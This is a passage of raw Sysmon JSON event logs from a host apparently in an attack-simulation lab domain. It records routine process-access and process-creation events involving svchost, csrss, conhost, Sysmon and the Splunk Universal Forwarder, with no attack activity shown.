06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1274-5F25-0000-001009510900}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1274-5F25-0000-001009510900}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.284\r\nProcessGuid: {E2A3D6B1-1275-5F25-0000-0010A8520900}\r\nProcessId: 2580\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.284","ProcessGuid":"{E2A3D6B1-1275-5F25-0000-0010A8520900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-0010A8520900}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-0010A8520900}","TargetProcessId":"2580","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-0010A8520900}\r\nTargetProcessId: 2580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-0010A8520900}","TargetProcessId":"2580","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6531,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.283","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6532,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.283\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 